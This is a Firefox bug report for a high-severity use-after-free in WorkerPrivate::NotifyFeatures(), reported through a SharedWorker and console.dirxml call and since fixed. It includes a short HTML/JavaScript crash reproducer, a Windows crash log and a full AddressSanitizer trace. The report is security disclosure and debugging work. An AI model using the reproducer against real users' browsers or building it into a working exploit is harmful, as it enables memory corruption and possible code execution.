Closed Bug 1268303 Opened 8 years ago Closed 8 years ago

Console - Use After Free in WorkerPrivate::NotifyFeatures()

Categories

(Core :: DOM: Workers, defect)

49 Branch
x86
All
defect
Not set
normal

Tracking

()

RESOLVED FIXED
mozilla49
Tracking Status
firefox47 --- unaffected
firefox48 + fixed
firefox49 + fixed
firefox-esr45 --- unaffected

People

(Reporter: loobenyang, Assigned: baku)

References

Details

(Keywords: csectype-uaf, regression, sec-high, Whiteboard: btpp-active)

Attachments

(2 files)

Reproduce test case (Console_UAF_NotifyFeatures_Repro.html):

<html><body></body>
<script type="text/javascript">
var blob = new Blob(['var a= new String("");interval = setInterval(function(){console.dirxml(a);close();}, 31);'],{type: "text/javascript"});
var wk = new SharedWorker(window.URL.createObjectURL(blob));
setTimeout(function(){location.reload()},300);
</script></html>


Steps to reproduce:

1.Open repro Console_UAF_NotifyFeatures_Repro.html in Firefox browser.
2.Firefox crashes by attempting to execute corrupted arbitrary code address:


Firefox version: 49.0a1 (2016-04-28)

First-chance exception at 0xFFFE47E9 in firefox.exe: 0xC0000005: Access violation executing location 0xFFFE47E9.
Unhandled exception at 0xFFFE47E9 in firefox.exe: 0xC0000005: Access violation executing location 0xFFFE47E9.

 	fffe47e9()	Unknown
 	[Frames below may be incorrect and/or missing]	
>	xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext * aCx, mozilla::dom::workers::Status aStatus) Line 5261	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext * aCx, mozilla::dom::workers::Status aStatus) Line 5745	C++
 	xul.dll!`anonymous namespace'::NotifyRunnable::WorkerRun(JSContext * aCx, mozilla::dom::workers::WorkerPrivate * aWorkerPrivate) Line 892	C++
 	xul.dll!mozilla::dom::workers::WorkerRunnable::Run() Line 376	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() Line 5051	C++
 	xul.dll!mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext * aCx) Line 4514	C++
 	xul.dll!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run() Line 2694	C++
 	xul.dll!nsThread::ProcessNextEvent(bool aMayWait, bool * aResult) Line 989	C++
 	xul.dll!NS_ProcessNextEvent(nsIThread * aThread, bool aMayWait) Line 290	C++
 	xul.dll!mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate * aDelegate) Line 369	C++
 	xul.dll!MessageLoop::RunHandler() Line 224	C++
 	xul.dll!MessageLoop::Run() Line 204	C++
 	xul.dll!nsThread::ThreadFunc(void * aArg) Line 393	C++
 	nss3.dll!_PR_NativeRunThread(void * arg) Line 419	C
 	nss3.dll!pr_root(void * arg) Line 95	C
 	[External Code]
I ran the same test case in official Linux Asan build, Asan reported a Use After Free in WorkerPrivate::NotifyFeatures():


48.0a1 (2016-04-13)

=================================================================
==7524==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000297d38 at pc 0x7f33feac5f04 bp 0x7f33ba75b870 sp 0x7f33ba75b868
READ of size 8 at 0x608000297d38 thread T50 (DOM Worker)
    #0 0x7f33feac5f03 in mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5207
    #1 0x7f33feac1684 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5684
    #2 0x7f33feae1860 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:374
    #3 0x7f33feac11e5 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4995
    #4 0x7f33feabf52c in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4455
    #5 0x7f33fea1b196 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2692
    #6 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #7 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #8 0x7f33f9a82276 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:369
    #9 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #10 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #11 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #12 0x7f33f8d106ae in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:396
    #13 0x7f340f0353ef in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216
    #14 0x7f3412557181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #15 0x7f341165847c (/lib/x86_64-linux-gnu/libc.so.6+0xfa47c)

0x608000297d38 is located 24 bytes inside of 88-byte region [0x608000297d20,0x608000297d78)
freed by thread T50 (DOM Worker) here:
    #0 0x471fe1 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7f33f8d8d9cc in nsRunnable::Release() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:35
    #2 0x7f33fb607646 in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:39
    #3 0x7f33fb607646 in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:377
    #4 0x7f33fb607646 in ~RefPtr /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77
    #5 0x7f33fb607646 in ~ConsoleReleaseRunnable /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:434
    #6 0x7f33fb607646 in mozilla::dom::ConsoleRunnable::PostDispatch()::ConsoleReleaseRunnable::~ConsoleReleaseRunnable() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:434
    #7 0x7f33feae376c in Release /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:213
    #8 0x7f33feae376c in mozilla::dom::workers::WorkerControlRunnable::Release() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:573
    #9 0x7f33feac1220 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4999
    #10 0x7f33feaed56d in ProcessAllControlRunnables /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.h:1386
    #11 0x7f33feaed56d in OnProcessNextEvent /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4581
    #12 0x7f33feaed56d in mozilla::dom::workers::WorkerThread::Observer::OnProcessNextEvent(nsIThreadInternal*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerThread.cpp:334
    #13 0x7f33f8d148bd in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:968
    #14 0x7f33f8d8e9de in NS_ProcessPendingEvents(nsIThread*, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:232
    #15 0x7f33feac1765 in ClearMainEventQueue /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5025
    #16 0x7f33feac1765 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5695
    #17 0x7f33fcd7509a in mozilla::dom::WorkerGlobalScopeBinding_workers::close(JSContext*, JS::Handle<JSObject*>, mozilla::dom::workers::WorkerGlobalScope*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/WorkerGlobalScopeBinding.cpp:184
    #18 0x7f33fcd6a417 in mozilla::dom::WorkerGlobalScopeBinding_workers::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/WorkerGlobalScopeBinding.cpp:1370
    #19 0x7f340300db4c in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235
    #20 0x7f340300db4c in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:476
    #21 0x7f340304f505 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2807
    #22 0x7f340303042e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:426
    #23 0x7f340300e12f in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:494
    #24 0x7f3403060564 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value const*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:528
    #25 0x7f3402be8288 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2852
    #26 0x7f33feace867 in mozilla::dom::workers::WorkerPrivate::RunExpiredTimeouts(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:6058
    #27 0x7f33feae1860 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:374
    #28 0x7f33f8d2ea84 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsTimerImpl.cpp:527
    #29 0x7f33f8d08815 in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/TimerThread.cpp:286
    #30 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #31 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #32 0x7f33feabf81e in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4547
    #33 0x7f33fea1b196 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2692
    #34 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #35 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #36 0x7f33f9a82276 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:369
    #37 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #38 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #39 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #40 0x7f33f8d106ae in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:396

previously allocated by thread T50 (DOM Worker) here:
    #0 0x4721e1 in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48b8dd in moz_xmalloc /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7f33fb5c4eba in operator new /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:186
    #3 0x7f33fb5c4eba in mozilla::dom::Console::Method(JSContext*, mozilla::dom::Console::MethodName, nsAString_internal const&, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:1442
    #4 0x7f33fb5c65c5 in mozilla::dom::Console::Dirxml(JSContext*, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/Console.cpp:1058
    #5 0x7f33fcf50fec in mozilla::dom::ConsoleBinding::dirxml(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Console*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/ConsoleBinding.cpp:2528
    #6 0x7f33fd50fd25 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2778
    #7 0x7f340300db4c in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235
    #8 0x7f340300db4c in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:476
    #9 0x7f340304f505 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2807
    #10 0x7f340303042e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:426
    #11 0x7f340300e12f in js::Invoke(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:494
    #12 0x7f3403060564 in js::Invoke(JSContext*, JS::Value const&, JS::Value const&, unsigned int, JS::Value const*, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:528
    #13 0x7f3402be8288 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2852
    #14 0x7f33feace867 in mozilla::dom::workers::WorkerPrivate::RunExpiredTimeouts(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:6058
    #15 0x7f33feae1860 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerRunnable.cpp:374
    #16 0x7f33f8d2ea84 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsTimerImpl.cpp:527
    #17 0x7f33f8d08815 in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/TimerThread.cpp:286
    #18 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #19 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #20 0x7f33feabf81e in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4547
    #21 0x7f33fea1b196 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2692
    #22 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #23 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #24 0x7f33f9a82276 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:369
    #25 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #26 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #27 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #28 0x7f33f8d106ae in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:396
    #29 0x7f340f0353ef in _pt_root /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:216
    #30 0x7f3412557181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T50 (DOM Worker) created by T0 here:
    #0 0x45ea55 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7f340f031b40 in _PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:457
    #2 0x7f340f0316aa in PR_CreateThread /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:548
    #3 0x7f33f8d11e3d in nsThread::Init() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:526
    #4 0x7f33feaecb1a in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerThread.cpp:92
    #5 0x7f33fe9cca6f in mozilla::dom::workers::RuntimeService::ScheduleWorker(mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:1720
    #6 0x7f33fe9ca5cf in mozilla::dom::workers::RuntimeService::RegisterWorker(mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:1547
    #7 0x7f33feabb71a in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString_internal const&, bool, mozilla::dom::WorkerType, nsACString_internal const&, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:4112
    #8 0x7f33fe9d2932 in mozilla::dom::workers::RuntimeService::CreateSharedWorkerFromLoadInfo(JSContext*, mozilla::dom::workers::WorkerLoadInfo*, nsAString_internal const&, nsACString_internal const&, mozilla::dom::workers::SharedWorker**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2301
    #9 0x7f33fe9d22be in mozilla::dom::workers::RuntimeService::CreateSharedWorker(mozilla::dom::GlobalObject const&, nsAString_internal const&, nsACString_internal const&, mozilla::dom::workers::SharedWorker**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/RuntimeService.cpp:2255
    #10 0x7f33fea79324 in mozilla::dom::workers::SharedWorker::Constructor(mozilla::dom::GlobalObject const&, JSContext*, nsAString_internal const&, mozilla::dom::Optional<nsAString_internal> const&, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/SharedWorker.cpp:68
    #11 0x7f33fc8d6e63 in mozilla::dom::SharedWorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/SharedWorkerBinding.cpp:241
    #12 0x7f3403060b19 in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235
    #13 0x7f3403060b19 in CallJSNativeConstructor /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:268
    #14 0x7f3403060b19 in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:565
    #15 0x7f340304f4be in ConstructFromStack /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:592
    #16 0x7f340304f4be in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2799
    #17 0x7f340303042e in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:426
    #18 0x7f3403061a2b in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:682
    #19 0x7f340306202f in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:714
    #20 0x7f3402bfa934 in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::Handle<js::StaticScope*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4466
    #21 0x7f3402bfb3a7 in Evaluate /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4493
    #22 0x7f3402bfb3a7 in JS::Evaluate(JSContext*, JS::AutoVectorRooter<JSObject*>&, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:4554
    #23 0x7f33fb948fc6 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions const&, JS::MutableHandle<JS::Value>, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:212
    #24 0x7f33fb949c81 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, void**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsJSUtils.cpp:279
    #25 0x7f33fb9d364b in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, JS::SourceBufferHolder&) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:1141
    #26 0x7f33fb9d03c4 in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:961
    #27 0x7f33fb9c9c4c in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptLoader.cpp:726
    #28 0x7f33fb9c660e in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsScriptElement.cpp:142
    #29 0x7f33fac18ee4 in operator-> /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsIScriptElement.h:221
    #30 0x7f33fac18ee4 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:666
    #31 0x7f33fac17534 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:491
    #32 0x7f33fac1d70b in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128
    #33 0x7f33f8d14c60 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:994
    #34 0x7f33f8d8ecca in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #35 0x7f33f9a80dee in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:98
    #36 0x7f33f99f8e1c in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:230
    #37 0x7f33f99f8e1c in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:223
    #38 0x7f33f99f8e1c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:203
    #39 0x7f33fefc7057 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156
    #40 0x7f3400e79248 in nsAppStartup::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/components/startup/nsAppStartup.cpp:281
    #41 0x7f3400f781da in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4340
    #42 0x7f3400f79446 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4437
    #43 0x7f3400f7a28e in XRE_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsAppRunner.cpp:4543
    #44 0x48a793 in do_main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:220
    #45 0x48a793 in main /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/browser/app/nsBrowserApp.cpp:360
    #46 0x7f341157fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5207 mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status)
Shadow bytes around the buggy address:
  0x0c108004af50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c108004af60: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c108004af70: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c108004af80: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c108004af90: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
=>0x0c108004afa0: fa fa fa fa fd fd fd[fd]fd fd fd fd fd fd fd fa
  0x0c108004afb0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c108004afc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c108004afd0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
